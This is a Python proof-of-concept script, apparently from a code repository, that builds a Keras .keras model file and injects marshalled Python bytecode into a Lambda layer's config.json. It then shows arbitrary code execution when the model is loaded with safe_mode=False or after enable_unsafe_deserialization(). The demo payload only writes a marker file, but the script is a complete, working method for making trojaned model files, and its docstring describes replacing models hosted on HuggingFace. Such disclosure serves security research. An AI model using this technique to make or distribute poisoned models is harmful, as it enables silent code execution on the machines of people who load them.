File size: 8,712 Bytes
56f70cb
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
#!/usr/bin/env python3
"""
Keras .keras Lambda Layer - Arbitrary Code Execution PoC

VULNERABILITY:
  .keras model files are ZIP archives containing config.json. Lambda layers
  store base64-encoded marshal'd Python bytecode in config.json under the
  "function" -> "config" -> "code" key. When a model is loaded with
  safe_mode=False (or after calling tf.keras.config.enable_unsafe_deserialization()),
  this bytecode is unmarshalled and executed - enabling arbitrary code execution
  from a crafted model file.

IMPACT:
  Any user who loads an untrusted .keras file with safe_mode=False gets arbitrary
  code execution. Many official tutorials and StackOverflow answers recommend
  safe_mode=False to load models with custom layers. HuggingFace hosts thousands
  of .keras files that could be replaced with malicious versions.

ATTACK VECTOR:
  1. Attacker creates a legitimate-looking .keras model
  2. Attacker replaces Lambda layer bytecode with malicious payload
  3. Victim downloads model from HuggingFace, Kaggle, or email
  4. Victim loads with safe_mode=False -> code executes silently

AFFECTED:
  - keras >= 3.0 (all versions using .keras format)
  - tensorflow >= 2.16 (ships keras 3.x)

TESTED: TensorFlow 2.20.0, Keras 3.13.2, Python 3.12

Usage:
  python3 poc_keras_lambda_ace.py
"""

import os
import sys
import json
import zipfile
import marshal
import base64
import types
import tempfile
import shutil

os.environ["TF_CPP_MIN_LOG_LEVEL"] = "3"

MARKER_FILE = "/tmp/keras_ace_marker.txt"
PAYLOAD_MSG = "KERAS_LAMBDA_ACE_CONFIRMED"


def create_malicious_keras_model(output_path):
    import tensorflow as tf
    import numpy as np

    print("[*] Step 1: Building legitimate model with Lambda layer...")
    model = tf.keras.Sequential([
        tf.keras.layers.Input(shape=(5,)),
        tf.keras.layers.Dense(10, name="dense_1"),
        tf.keras.layers.Lambda(lambda x: x * 2, name="lambda_layer"),
        tf.keras.layers.Dense(1, name="output"),
    ])
    model.compile(optimizer="adam", loss="mse")

    tmp_dir = tempfile.mkdtemp(prefix="keras_poc_")
    legit_path = os.path.join(tmp_dir, "legit.keras")
    model.save(legit_path)
    print("    Saved legitimate model: {} ({} bytes)".format(legit_path, os.path.getsize(legit_path)))

    print("[*] Step 2: Extracting .keras ZIP and injecting malicious bytecode...")
    with zipfile.ZipFile(legit_path, "r") as zf:
        archive_files = {name: zf.read(name) for name in zf.namelist()}

    config = json.loads(archive_files["config.json"])

    evil_source = "lambda x: (__import__('builtins').open('{}', 'w').write('{}\\n'), x)[-1]".format(
        MARKER_FILE, PAYLOAD_MSG
    )
    print("    Payload: write '{}' to {}".format(PAYLOAD_MSG, MARKER_FILE))

    evil_expr = compile(evil_source, "<payload>", "eval")
    lambda_code = [c for c in evil_expr.co_consts if isinstance(c, types.CodeType)][0]

    evil_b64 = base64.b64encode(marshal.dumps(lambda_code)).decode() + "\n"
    print("    Encoded bytecode: {} chars".format(len(evil_b64)))

    def inject_into_lambda(obj):
        if isinstance(obj, dict):
            if obj.get("class_name") == "Lambda" and "config" in obj:
                func = obj["config"].get("function", {})
                if isinstance(func, dict) and "config" in func:
                    func["config"]["code"] = evil_b64
                    print("    Injected payload into Lambda layer config")
                    return True
            for v in obj.values():
                if isinstance(v, (dict, list)) and inject_into_lambda(v):
                    return True
        elif isinstance(obj, list):
            for v in obj:
                if inject_into_lambda(v):
                    return True
        return False

    if not inject_into_lambda(config):
        print("    ERROR: Could not find Lambda layer in config.json")
        sys.exit(1)

    print("[*] Step 3: Repacking .keras file with malicious config...")
    archive_files["config.json"] = json.dumps(config).encode()
    with zipfile.ZipFile(output_path, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in archive_files.items():
            zf.writestr(name, data)

    print("    Malicious model: {} ({} bytes)".format(output_path, os.path.getsize(output_path)))
    shutil.rmtree(tmp_dir)


def test_safe_mode_true(model_path):
    import tensorflow as tf
    print("\n[*] Test A: Loading with safe_mode=True (default)...")
    if os.path.exists(MARKER_FILE):
        os.remove(MARKER_FILE)
    try:
        tf.keras.models.load_model(model_path)
        print("    Model loaded (unexpected)")
        return os.path.exists(MARKER_FILE)
    except Exception as e:
        print("    Blocked as expected: {}".format(str(e)[:150]))
        return False


def test_safe_mode_false(model_path):
    import tensorflow as tf
    import numpy as np
    print("\n[*] Test B: Loading with safe_mode=False...")
    if os.path.exists(MARKER_FILE):
        os.remove(MARKER_FILE)
    try:
        loaded = tf.keras.models.load_model(model_path, safe_mode=False)
        print("    Model loaded with safe_mode=False")

        if os.path.exists(MARKER_FILE):
            with open(MARKER_FILE) as f:
                content = f.read().strip()
            print("    >>> ACE CONFIRMED ON LOAD: marker = '{}'".format(content))
            return True

        print("    No execution on load. Running inference...")
        result = loaded.predict(np.random.randn(1, 5), verbose=0)
        print("    Inference result: {}".format(result))

        if os.path.exists(MARKER_FILE):
            with open(MARKER_FILE) as f:
                content = f.read().strip()
            print("    >>> ACE CONFIRMED ON INFERENCE: marker = '{}'".format(content))
            return True

        print("    No ACE triggered")
        return False
    except Exception as e:
        print("    Error: {}".format(str(e)[:300]))
        return False


def test_enable_unsafe_deserialization(model_path):
    import tensorflow as tf
    import numpy as np
    print("\n[*] Test C: Loading with enable_unsafe_deserialization()...")
    if os.path.exists(MARKER_FILE):
        os.remove(MARKER_FILE)
    try:
        tf.keras.config.enable_unsafe_deserialization()
        loaded = tf.keras.models.load_model(model_path)
        print("    Model loaded with enable_unsafe_deserialization")

        if os.path.exists(MARKER_FILE):
            with open(MARKER_FILE) as f:
                content = f.read().strip()
            print("    >>> ACE CONFIRMED ON LOAD: marker = '{}'".format(content))
            return True

        print("    No execution on load. Running inference...")
        result = loaded.predict(np.random.randn(1, 5), verbose=0)

        if os.path.exists(MARKER_FILE):
            with open(MARKER_FILE) as f:
                content = f.read().strip()
            print("    >>> ACE CONFIRMED ON INFERENCE: marker = '{}'".format(content))
            return True

        print("    No ACE triggered")
        return False
    except Exception as e:
        print("    Error: {}".format(str(e)[:300]))
        return False


def main():
    print("=" * 70)
    print("Keras .keras Lambda Layer - Arbitrary Code Execution PoC")
    print("=" * 70)

    script_dir = os.path.dirname(os.path.abspath(__file__))
    malicious_model = os.path.join(script_dir, "malicious_lambda.keras")

    if os.path.exists(MARKER_FILE):
        os.remove(MARKER_FILE)

    create_malicious_keras_model(malicious_model)

    ace_safe = test_safe_mode_true(malicious_model)
    ace_unsafe = test_safe_mode_false(malicious_model)
    ace_global = test_enable_unsafe_deserialization(malicious_model)

    print("\n" + "=" * 70)
    print("RESULTS:")
    print("  safe_mode=True (default):           {}".format("ACE!" if ace_safe else "Blocked (correct)"))
    print("  safe_mode=False:                    {}".format("ACE!" if ace_unsafe else "No ACE"))
    print("  enable_unsafe_deserialization():     {}".format("ACE!" if ace_global else "No ACE"))
    print()

    if ace_unsafe or ace_global:
        print("VULNERABILITY CONFIRMED: .keras Lambda bytecode enables arbitrary")
        print("code execution when loaded with safe_mode=False or after calling")
        print("enable_unsafe_deserialization().")
        print()
        print("Marker file: {}".format(MARKER_FILE))
        if os.path.exists(MARKER_FILE):
            with open(MARKER_FILE) as f:
                print("Contents: {}".format(f.read().strip()))
        print("\nMalicious model saved to: {}".format(malicious_model))
    else:
        print("No ACE triggered. Check TensorFlow/Keras version.")

    print("=" * 70)


if __name__ == "__main__":
    main()